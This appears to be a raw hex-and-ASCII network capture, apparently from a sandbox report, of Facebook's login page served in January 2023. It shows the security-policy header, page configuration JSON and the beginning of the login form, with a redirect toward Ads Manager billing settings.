https://www.facebook.com/csp/reporting/?m=c&minimize=0;
                                                                                                                                                                                    2023-01-05 07:59:13 UTC15343INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 3b 73 63 72 69 70 74 2d 73 72 63 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 62 6c 6f 62 3a 20 64 61 74 61 3a 20 27 73 65 6c 66 27 3b 73 74 79 6c 65 2d 73 72 63 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 64 61 74 61 3a 20 2a 2e 66 61 63 65 62
                                                                                                                                                                                    Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.faceb
                                                                                                                                                                                    2023-01-05 07:59:13 UTC15345INData Raw: 38 37 34 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c
                                                                                                                                                                                    Data Ascii: 8740<!DOCTYPE html><html l
                                                                                                                                                                                    2023-01-05 07:59:13 UTC15345INData Raw: 61 6e 67 3d 22 65 6e 22 20 69 64 3d 22 66 61 63 65 62 6f 6f 6b 22 20 63 6c 61 73 73 3d 22 6e 6f 5f 6a 73 22 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 6f 72 69 67 69 6e 22 20 69 64 3d 22 6d 65 74 61 5f 72 65 66 65 72 72 65 72 22 20 2f 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 56 41 68 63 68 70 46 51 22 3e 66 75 6e 63 74 69 6f 6e 20 65 6e 76 46 6c 75 73 68 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 62 29 7b 66 6f 72 28 76 61 72 20 63 20 69 6e 20 61 29 62 5b 63 5d 3d 61 5b 63 5d 7d 77 69 6e 64 6f 77 2e 72 65 71 75 69 72 65 4c 61 7a 79 3f 77 69 6e 64 6f 77
                                                                                                                                                                                    Data Ascii: ang="en" id="facebook" class="no_js"><head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="VAhchpFQ">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window
                                                                                                                                                                                    2023-01-05 07:59:13 UTC15346INData Raw: 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 20 2f 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 63 61 6e 6f 6e 69 63 61 6c 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d
                                                                                                                                                                                    Data Ascii: eta property="og:url" content="https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" /><meta property="og:locale" content="en_US" /><link rel="canonical" href="https://www.facebook.com
                                                                                                                                                                                    2023-01-05 07:59:13 UTC15348INData Raw: 74 61 2d 62 6f 6f 74 6c 6f 61 64 65 72 2d 68 61 73 68 3d 22 59 6f 32 55 7a 4f 68 22 20 2f 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 57 2f 72 2f 4e 6b 4a 57 66 32 44 48 41 79 67 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 64 61 74 61 2d 62 6f 6f 74 6c 6f 61 64 65 72 2d 68 61 73 68 3d 22 58 4e 61 4d 6e 32 2b 22 20 6e 6f 6e 63 65 3d 22 56 41 68 63 68 70 46 51 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 56 41 68 63 68 70 46 51 22 3e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 48 61 73 74 65 53 75 70 70 6f 72 74 44 61 74 61 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 6d 29 7b 6d 2e 68
                                                                                                                                                                                    Data Ascii: ta-bootloader-hash="Yo2UzOh" /><script src="https://static.xx.fbcdn.net/rsrc.php/v3/yW/r/NkJWf2DHAyg.js?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="XNaMn2+" nonce="VAhchpFQ"></script><script nonce="VAhchpFQ">requireLazy(["HasteSupportData"],function(m){m.h
                                                                                                                                                                                    2023-01-05 07:59:13 UTC15349INData Raw: 29 29 2e 68 61 6e 64 6c 65 28 7b 22 64 65 66 69 6e 65 22 3a 5b 5b 22 55 52 4c 46 72 61 67 6d 65 6e 74 50 72 65 6c 75 64 65 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 68 61 73 68 74 61 67 52 65 64 69 72 65 63 74 22 3a 74 72 75 65 2c 22 66 72 61 67 42 6c 61 63 6b 6c 69 73 74 22 3a 5b 22 6e 6f 6e 63 65 22 2c 22 61 63 63 65 73 73 5f 74 6f 6b 65 6e 22 2c 22 6f 61 75 74 68 5f 74 6f 6b 65 6e 22 2c 22 78 73 22 2c 22 63 68 65 63 6b 70 6f 69 6e 74 5f 64 61 74 61 22 2c 22 63 6f 64 65 22 5d 7d 2c 31 33 37 5d 2c 5b 22 43 6f 6d 65 74 50 65 72 73 69 73 74 51 75 65 72 79 50 61 72 61 6d 73 22 2c 5b 5d 2c 7b 22 72 65 6c 61 74 69 76 65 22 3a 7b 7d 2c 22 64 6f 6d 61 69 6e 22 3a 7b 7d 7d 2c 36 32 33 31 5d 2c 5b 22 43 6f 6f 6b 69 65 44 6f 6d 61 69 6e 22 2c 5b 5d 2c 7b 22 64 6f 6d
                                                                                                                                                                                    Data Ascii: )).handle({"define":[["URLFragmentPreludeConfig",[],{"hashtagRedirect":true,"fragBlacklist":["nonce","access_token","oauth_token","xs","checkpoint_data","code"]},137],["CometPersistQueryParams",[],{"relative":{},"domain":{}},6231],["CookieDomain",[],{"dom
                                                                                                                                                                                    2023-01-05 07:59:13 UTC15351INData Raw: 7b 22 41 43 43 4f 55 4e 54 5f 49 44 22 3a 22 30 22 2c 22 55 53 45 52 5f 49 44 22 3a 22 30 22 2c 22 4e 41 4d 45 22 3a 22 22 2c 22 53 48 4f 52 54 5f 4e 41 4d 45 22 3a 6e 75 6c 6c 2c 22 49 53 5f 42 55 53 49 4e 45 53 53 5f 50 45 52 53 4f 4e 5f 41 43 43 4f 55 4e 54 22 3a 66 61 6c 73 65 2c 22 48 41 53 5f 53 45 43 4f 4e 44 41 52 59 5f 42 55 53 49 4e 45 53 53 5f 50 45 52 53 4f 4e 22 3a 66 61 6c 73 65 2c 22 49 53 5f 46 41 43 45 42 4f 4f 4b 5f 57 4f 52 4b 5f 41 43 43 4f 55 4e 54 22 3a 66 61 6c 73 65 2c 22 49 53 5f 4d 45 53 53 45 4e 47 45 52 5f 4f 4e 4c 59 5f 55 53 45 52 22 3a 66 61 6c 73 65 2c 22 49 53 5f 44 45 41 43 54 49 56 41 54 45 44 5f 41 4c 4c 4f 57 45 44 5f 4f 4e 5f 4d 45 53 53 45 4e 47 45 52 22 3a 66 61 6c 73 65 2c 22 49 53 5f 4d 45 53 53 45 4e 47 45 52 5f
                                                                                                                                                                                    Data Ascii: {"ACCOUNT_ID":"0","USER_ID":"0","NAME":"","SHORT_NAME":null,"IS_BUSINESS_PERSON_ACCOUNT":false,"HAS_SECONDARY_BUSINESS_PERSON":false,"IS_FACEBOOK_WORK_ACCOUNT":false,"IS_MESSENGER_ONLY_USER":false,"IS_DEACTIVATED_ALLOWED_ON_MESSENGER":false,"IS_MESSENGER_
                                                                                                                                                                                    2023-01-05 07:59:13 UTC15352INData Raw: 63 74 75 72 65 22 3a 22 36 34 22 2c 22 70 6c 61 74 66 6f 72 6d 4e 61 6d 65 22 3a 22 57 69 6e 64 6f 77 73 22 2c 22 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 22 3a 22 31 30 22 2c 22 70 6c 61 74 66 6f 72 6d 46 75 6c 6c 56 65 72 73 69 6f 6e 22 3a 22 31 30 22 7d 2c 35 32 37 5d 2c 5b 22 50 72 6f 6d 69 73 65 55 73 65 50 6f 6c 79 66 69 6c 6c 53 65 74 49 6d 6d 65 64 69 61 74 65 47 4b 22 2c 5b 5d 2c 7b 22 77 77 77 5f 61 6c 77 61 79 73 5f 75 73 65 5f 70 6f 6c 79 66 69 6c 6c 5f 73 65 74 69 6d 6d 65 64 69 61 74 65 22 3a 66 61 6c 73 65 7d 2c 32 31 39 30 5d 2c 5b 22 4b 53 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 6b 69 6c 6c 65 64 22 3a 7b 22 5f 5f 73 65 74 22 3a 5b 22 4d 4c 48 55 42 5f 46 4c 4f 57 5f 41 55 54 4f 52 45 46 52 45 53 48 5f 53 45 41 52 43 48 22 2c 22 4e 45
                                                                                                                                                                                    Data Ascii: cture":"64","platformName":"Windows","platformVersion":"10","platformFullVersion":"10"},527],["PromiseUsePolyfillSetImmediateGK",[],{"www_always_use_polyfill_setimmediate":false},2190],["KSConfig",[],{"killed":{"__set":["MLHUB_FLOW_AUTOREFRESH_SEARCH","NE
                                                                                                                                                                                    2023-01-05 07:59:13 UTC15354INData Raw: 5f 44 45 4c 45 54 49 4f 4e 5f 43 41 52 44 22 2c 22 42 49 5a 5f 49 4e 42 4f 58 5f 50 4f 50 5f 55 50 5f 54 49 50 5f 4e 41 56 49 47 41 54 49 4f 4e 5f 42 55 47 5f 46 49 58 22 2c 22 53 52 54 5f 52 45 56 49 45 57 5f 44 49 53 41 42 4c 45 5f 46 45 4c 4c 4f 57 53 48 49 50 5f 52 45 56 49 45 57 22 2c 22 45 4f 5f 53 54 4f 52 45 5f 48 4f 4d 45 5f 50 41 47 45 5f 43 4f 56 49 44 31 39 5f 42 41 4e 4e 45 52 22 5d 7d 2c 22 6b 6f 22 3a 7b 22 5f 5f 73 65 74 22 3a 5b 22 33 4f 73 4c 76 6e 53 48 4e 54 74 22 2c 22 31 47 37 77 4a 36 62 4a 74 39 4b 22 2c 22 39 4e 70 6b 47 59 77 7a 72 50 47 22 2c 22 33 6f 68 35 4d 77 38 36 55 53 6a 22 2c 22 38 4e 41 63 65 45 79 39 4a 5a 6f 22 2c 22 37 46 4f 49 7a 6f 73 36 58 4a 58 22 2c 22 72 66 38 4a 45 50 47 67 4f 69 22 2c 22 34 6a 33 36 53 56 7a
                                                                                                                                                                                    Data Ascii: _DELETION_CARD","BIZ_INBOX_POP_UP_TIP_NAVIGATION_BUG_FIX","SRT_REVIEW_DISABLE_FELLOWSHIP_REVIEW","EO_STORE_HOME_PAGE_COVID19_BANNER"]},"ko":{"__set":["3OsLvnSHNTt","1G7wJ6bJt9K","9NpkGYwzrPG","3oh5Mw86USj","8NAceEy9JZo","7FOIzos6XJX","rf8JEPGgOi","4j36SVz
                                                                                                                                                                                    2023-01-05 07:59:13 UTC15355INData Raw: 69 6f 2e 6e 6f 22 5d 7d 2c 33 38 37 31 5d 2c 5b 22 49 6e 69 74 69 61 6c 43 6f 6f 6b 69 65 43 6f 6e 73 65 6e 74 22 2c 5b 5d 2c 7b 22 64 65 66 65 72 43 6f 6f 6b 69 65 73 22 3a 66 61 6c 73 65 2c 22 69 6e 69 74 69 61 6c 43 6f 6e 73 65 6e 74 22 3a 7b 22 5f 5f 73 65 74 22 3a 5b 5d 7d 2c 22 6e 6f 43 6f 6f 6b 69 65 73 22 3a 66 61 6c 73 65 2c 22 73 68 6f 75 6c 64 53 68 6f 77 43 6f 6f 6b 69 65 42 61 6e 6e 65 72 22 3a 66 61 6c 73 65 7d 2c 34 33 32 38 5d 2c 5b 22 57 65 62 43 6f 6e 6e 65 63 74 69 6f 6e 43 6c 61 73 73 53 65 72 76 65 72 47 75 65 73 73 22 2c 5b 5d 2c 7b 22 63 6f 6e 6e 65 63 74 69 6f 6e 43 6c 61 73 73 22 3a 22 45 58 43 45 4c 4c 45 4e 54 22 7d 2c 34 37 30 35 5d 2c 5b 22 43 6f 6d 65 74 41 6c 74 70 61 79 4a 73 53 64 6b 49 66 72 61 6d 65 41 6c 6c 6f 77 65 64
                                                                                                                                                                                    Data Ascii: io.no"]},3871],["InitialCookieConsent",[],{"deferCookies":false,"initialConsent":{"__set":[]},"noCookies":false,"shouldShowCookieBanner":false},4328],["WebConnectionClassServerGuess",[],{"connectionClass":"EXCELLENT"},4705],["CometAltpayJsSdkIframeAllowed
                                                                                                                                                                                    2023-01-05 07:59:13 UTC15357INData Raw: 63 69 6d 61 6c 50 61 74 74 65 72 6e 49 6e 66 6f 22 3a 7b 22 70 72 69 6d 61 72 79 47 72 6f 75 70 53 69 7a 65 22 3a 33 2c 22 73 65 63 6f 6e 64 61 72 79 47 72 6f 75 70 53 69 7a 65 22 3a 33 7d 2c 22 6e 75 6d 62 65 72 69 6e 67 53 79 73 74 65 6d 44 61 74 61 22 3a 6e 75 6c 6c 7d 2c 35 34 5d 2c 5b 22 53 65 73 73 69 6f 6e 4e 61 6d 65 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 73 65 65 64 22 3a 22 32 4d 35 69 22 7d 2c 37 35 37 5d 2c 5b 22 5a 65 72 6f 43 61 74 65 67 6f 72 79 48 65 61 64 65 72 22 2c 5b 5d 2c 7b 7d 2c 31 31 32 37 5d 2c 5b 22 5a 65 72 6f 52 65 77 72 69 74 65 52 75 6c 65 73 22 2c 5b 5d 2c 7b 22 72 65 77 72 69 74 65 5f 72 75 6c 65 73 22 3a 7b 7d 2c 22 77 68 69 74 65 6c 69 73 74 22 3a 7b 22 5c 2f 68 72 5c 2f 72 22 3a 31 2c 22 5c 2f 68 72 5c 2f 70 22 3a 31 2c
                                                                                                                                                                                    Data Ascii: cimalPatternInfo":{"primaryGroupSize":3,"secondaryGroupSize":3},"numberingSystemData":null},54],["SessionNameConfig",[],{"seed":"2M5i"},757],["ZeroCategoryHeader",[],{},1127],["ZeroRewriteRules",[],{"rewrite_rules":{},"whitelist":{"\/hr\/r":1,"\/hr\/p":1,
                                                                                                                                                                                    2023-01-05 07:59:13 UTC15358INData Raw: 64 69 6e 67 22 3a 31 2c 22 5c 2f 78 74 69 2e 70 68 70 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 66 62 6c 69 74 65 5c 2f 63 6f 6e 66 69 67 5c 2f 22 3a 31 2c 22 5c 2f 68 72 5c 2f 7a 73 68 5c 2f 77 63 5c 2f 22 3a 31 2c 22 5c 2f 61 6a 61 78 5c 2f 62 6f 6f 74 6c 6f 61 64 65 72 2d 65 6e 64 70 6f 69 6e 74 5c 2f 22 3a 31 2c 22 5c 2f 6d 6f 62 69 6c 65 5c 2f 7a 65 72 6f 5c 2f 63 61 72 72 69 65 72 5f 70 61 67 65 5c 2f 22 3a 31 2c 22 5c 2f 6d 6f 62 69 6c 65 5c 2f 7a 65 72 6f 5c 2f 63 61 72 72 69 65 72 5f 70 61 67 65 5c 2f 65 64 75 63 61 74 69 6f 6e 5f 70 61 67 65 5c 2f 22 3a 31 2c 22 5c 2f 6d 6f 62 69 6c 65 5c 2f 7a 65 72 6f 5c 2f 63 61 72 72 69 65 72 5f 70 61 67 65 5c 2f 66 65 61 74 75 72 65 5f 73 77 69 74 63 68 5c 2f 22 3a 31 2c 22 5c 2f 6d 6f 62 69 6c 65 5c 2f 7a 65
                                                                                                                                                                                    Data Ascii: ding":1,"\/xti.php":1,"\/zero\/fblite\/config\/":1,"\/hr\/zsh\/wc\/":1,"\/ajax\/bootloader-endpoint\/":1,"\/mobile\/zero\/carrier_page\/":1,"\/mobile\/zero\/carrier_page\/education_page\/":1,"\/mobile\/zero\/carrier_page\/feature_switch\/":1,"\/mobile\/ze
                                                                                                                                                                                    2023-01-05 07:59:13 UTC15359INData Raw: 2f 6d 72 5c 2f 22 3a 31 2c 22 5c 2f 72 65 67 5c 2f 22 3a 31 2c 22 5c 2f 72 65 67 69 73 74 72 61 74 69 6f 6e 5c 2f 6c 6f 67 5c 2f 22 3a 31 2c 22 5c 2f 74 65 72 6d 73 5c 2f 22 3a 31 2c 22 5c 2f 66 31 32 33 5c 2f 22 3a 31 2c 22 5c 2f 65 78 70 65 72 74 5c 2f 22 3a 31 2c 22 5c 2f 65 78 70 65 72 74 73 5c 2f 22 3a 31 2c 22 5c 2f 74 65 72 6d 73 5c 2f 69 6e 64 65 78 2e 70 68 70 22 3a 31 2c 22 5c 2f 74 65 72 6d 73 2e 70 68 70 22 3a 31 2c 22 5c 2f 73 72 72 5c 2f 22 3a 31 2c 22 5c 2f 6d 73 69 74 65 5c 2f 72 65 64 69 72 65 63 74 5c 2f 22 3a 31 2c 22 5c 2f 66 62 73 5c 2f 70 69 78 65 6c 5c 2f 22 3a 31 2c 22 5c 2f 63 6f 6e 74 61 63 74 70 6f 69 6e 74 5c 2f 70 72 65 63 6f 6e 66 69 72 6d 61 74 69 6f 6e 5c 2f 22 3a 31 2c 22 5c 2f 63 6f 6e 74 61 63 74 70 6f 69 6e 74 5c 2f 63
                                                                                                                                                                                    Data Ascii: /mr\/":1,"\/reg\/":1,"\/registration\/log\/":1,"\/terms\/":1,"\/f123\/":1,"\/expert\/":1,"\/experts\/":1,"\/terms\/index.php":1,"\/terms.php":1,"\/srr\/":1,"\/msite\/redirect\/":1,"\/fbs\/pixel\/":1,"\/contactpoint\/preconfirmation\/":1,"\/contactpoint\/c
                                                                                                                                                                                    2023-01-05 07:59:13 UTC15361INData Raw: 72 69 74 69 63 61 6c 5f 66 6f 72 5f 66 61 6c 6c 62 61 63 6b 5f 66 72 6f 6d 5f 69 6d 6d 65 64 69 61 74 65 22 3a 66 61 6c 73 65 2c 22 69 6d 70 72 65 73 73 69 6f 6e 5f 65 78 70 65 72 69 6d 65 6e 74 5f 66 6c 61 67 22 3a 33 7d 2c 35 32 33 37 5d 2c 5b 22 63 72 3a 36 39 36 37 30 33 22 2c 5b 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 6e 75 6c 6c 2c 22 41 61 31 72 43 76 74 71 37 50 75 2d 52 68 56 59 4f 4f 46 79 48 49 46 36 71 76 76 34 54 36 77 77 45 76 4f 66 68 39 53 30 61 70 4f 77 4e 62 4b 67 49 4e 74 66 53 38 4b 5f 6a 4f 53 31 38 44 6c 50 4f 46 51 34 79 2d 71 47 5f 30 71 66 79 6a 41 6c 79 35 4a 66 31 71 62 74 4d 59 63 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 37 30 38 38 38 36 22 2c 5b 22 45 76 65 6e 74 50 72 6f 66 69 6c 65 72 49 6d 70 6c 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b
                                                                                                                                                                                    Data Ascii: ritical_for_fallback_from_immediate":false,"impression_experiment_flag":3},5237],["cr:696703",[],{"__rc":[null,"Aa1rCvtq7Pu-RhVYOOFyHIF6qvv4T6wwEvOfh9S0apOwNbKgINtfS8K_jOS18DlPOFQ4y-qG_0qfyjAly5Jf1qbtMYc"]},-1],["cr:708886",["EventProfilerImpl"],{"__rc":[
                                                                                                                                                                                    2023-01-05 07:59:13 UTC15362INData Raw: 54 36 77 77 45 76 4f 66 68 39 53 30 61 70 4f 77 4e 62 4b 67 49 4e 74 66 53 38 4b 5f 6a 4f 53 31 38 44 6c 50 4f 46 51 34 79 2d 71 47 5f 30 71 66 79 6a 41 6c 79 35 4a 66 31 71 62 74 4d 59 63 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 39 32 35 31 30 30 22 2c 5b 22 52 75 6e 42 6c 75 65 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 52 75 6e 42 6c 75 65 22 2c 22 41 61 31 72 43 76 74 71 37 50 75 2d 52 68 56 59 4f 4f 46 79 48 49 46 36 71 76 76 34 54 36 77 77 45 76 4f 66 68 39 53 30 61 70 4f 77 4e 62 4b 67 49 4e 74 66 53 38 4b 5f 6a 4f 53 31 38 44 6c 50 4f 46 51 34 79 2d 71 47 5f 30 71 66 79 6a 41 6c 79 35 4a 66 31 71 62 74 4d 59 63 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 37 32 39 34 31 34 22 2c 5b 22 56 69 73 75 61 6c 43 6f 6d 70 6c 65 74 69 6f 6e 22 5d 2c 7b 22 5f 5f 72 63
                                                                                                                                                                                    Data Ascii: T6wwEvOfh9S0apOwNbKgINtfS8K_jOS18DlPOFQ4y-qG_0qfyjAly5Jf1qbtMYc"]},-1],["cr:925100",["RunBlue"],{"__rc":["RunBlue","Aa1rCvtq7Pu-RhVYOOFyHIF6qvv4T6wwEvOfh9S0apOwNbKgINtfS8K_jOS18DlPOFQ4y-qG_0qfyjAly5Jf1qbtMYc"]},-1],["cr:729414",["VisualCompletion"],{"__rc
                                                                                                                                                                                    2023-01-05 07:59:13 UTC15364INData Raw: 63 6b 50 78 4c 6b 41 6d 6f 59 33 39 4b 34 2d 55 34 69 30 57 78 58 7a 6d 56 56 4e 6e 45 30 77 70 4d 71 61 47 73 69 71 36 44 68 79 6f 72 64 63 54 56 61 59 5a 4a 45 41 48 76 4d 61 5a 34 4b 46 62 62 33 50 66 4e 4f 66 32 42 6b 42 78 73 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 39 38 34 30 38 31 22 2c 5b 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 6e 75 6c 6c 2c 22 41 61 31 42 48 62 76 4c 36 41 41 34 70 6b 67 63 47 65 78 30 55 45 71 53 49 66 42 59 73 5a 5f 6a 77 39 6f 73 36 7a 47 5f 6a 35 63 68 74 63 72 2d 4f 79 5f 7a 76 6a 66 34 4d 39 36 78 42 75 34 61 66 72 64 79 4c 4d 33 56 5a 4e 6c 59 47 46 66 41 54 37 58 4d 71 44 36 57 34 4f 6d 4d 22 5d 7d 2c 2d 31 5d 5d 2c 22 72 65 71 75 69 72 65 22 3a 5b 5b 22 6d 61 72 6b 4a 53 45 6e 61 62 6c 65 64 22 5d 2c 5b 22 6c 6f 77 65 72 44
                                                                                                                                                                                    Data Ascii: ckPxLkAmoY39K4-U4i0WxXzmVVNnE0wpMqaGsiq6DhyordcTVaYZJEAHvMaZ4KFbb3PfNOf2BkBxs"]},-1],["cr:1984081",[],{"__rc":[null,"Aa1BHbvL6AA4pkgcGex0UEqSIfBYsZ_jw9os6zG_j5chtcr-Oy_zvjf4M96xBu4afrdyLM3VZNlYGFfAT7XMqD6W4OmM"]},-1]],"require":[["markJSEnabled"],["lowerD
                                                                                                                                                                                    2023-01-05 07:59:13 UTC15365INData Raw: 72 20 5f 35 30 66 34 22 3e 59 6f 75 20 6d 75 73 74 20 6c 6f 67 20 69 6e 20 74 6f 20 63 6f 6e 74 69 6e 75 65 2e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 34 2d 75 32 20 5f 31 77 31 74 20 5f 34 2d 75 38 20 5f 35 32 6a 76 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 78 6b 75 22 20 69 64 3d 22 68 65 61 64 65 72 5f 62 6c 6f 63 6b 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 5f 39 37 77 31 20 5f 35 30 66 36 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 39 61 78 7a 22 3e 4c 6f 67 20 49 6e 74 6f 20 46 61 63 65 62 6f 6f 6b 3c 2f 64 69 76 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 67 69 6e 5f 66 6f 72 6d 5f 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 6f 72 6d 20 69 64 3d 22 6c 6f
                                                                                                                                                                                    Data Ascii: r _50f4">You must log in to continue.</div></div></div><div class="_4-u2 _1w1t _4-u8 _52jv"><div class="_xku" id="header_block"><span class="_97w1 _50f6"><div class="_9axz">Log Into Facebook</div></span></div><div class="login_form_container"><form id="lo
                                                                                                                                                                                    2023-01-05 07:59:13 UTC15367INData Raw: 6c 67 6e 6a 73 22 20 6e 61 6d 65 3d 22 6c 67 6e 6a 73 22 20 76 61 6c 75 65 3d 22 6e 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 66 69 78 20 5f 35 34 36 36 20 5f 34 34 6d 67 22 20 69 64 3d 22 65 6d 61 69 6c 5f 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 63 6c 61 73 73 3d 22 69 6e 70 75 74 74 65 78 74 20 5f 35 35 72 31 20 69 6e 70 75 74 74 65 78 74 20 5f 31 6b 62 74 20 69 6e 70 75 74 74 65 78 74 20 5f 31 6b 62 74 22 20 6e 61 6d 65 3d 22 65 6d 61 69 6c 22 20 69 64 3d 22 65 6d 61 69 6c 22 20 74 61 62 69 6e 64 65 78 3d 22 30 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 45 6d 61 69 6c 20 6f 72 20 70 68 6f 6e 65 20 6e 75 6d 62 65 72 22 20 76 61 6c 75 65 3d 22 22 20 61 75 74 6f 66 6f 63 75 73 3d 22
                                                                                                                                                                                    Data Ascii: lgnjs" name="lgnjs" value="n" /><div class="clearfix _5466 _44mg" id="email_container"><input type="text" class="inputtext _55r1 inputtext _1kbt inputtext _1kbt" name="email" id="email" tabindex="0" placeholder="Email or phone number" value="" autofocus="
                                                                                                                                                                                    2023-01-05 07:59:13 UTC15368INData Raw: 6d 65 3d 22 70 72 65 66 69 6c 6c 5f 73 6f 75 72 63 65 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 69 64 3d 22 70 72 65 66 69 6c 6c 5f 74 79 70 65 22 20 6e 61 6d 65 3d 22 70 72 65 66 69 6c 6c 5f 74 79 70 65 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 69 64 3d 22 66 69 72 73 74 5f 70 72 65 66 69 6c 6c 5f 73 6f 75 72 63 65 22 20 6e 61 6d 65 3d 22 66 69 72 73 74 5f 70 72 65 66 69 6c 6c 5f 73 6f 75 72 63 65 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 69 64 3d 22 66 69 72 73 74 5f 70 72 65 66 69 6c 6c
                                                                                                                                                                                    Data Ascii: me="prefill_source" /><input type="hidden" autocomplete="off" id="prefill_type" name="prefill_type" /><input type="hidden" autocomplete="off" id="first_prefill_source" name="first_prefill_source" /><input type="hidden" autocomplete="off" id="first_prefill
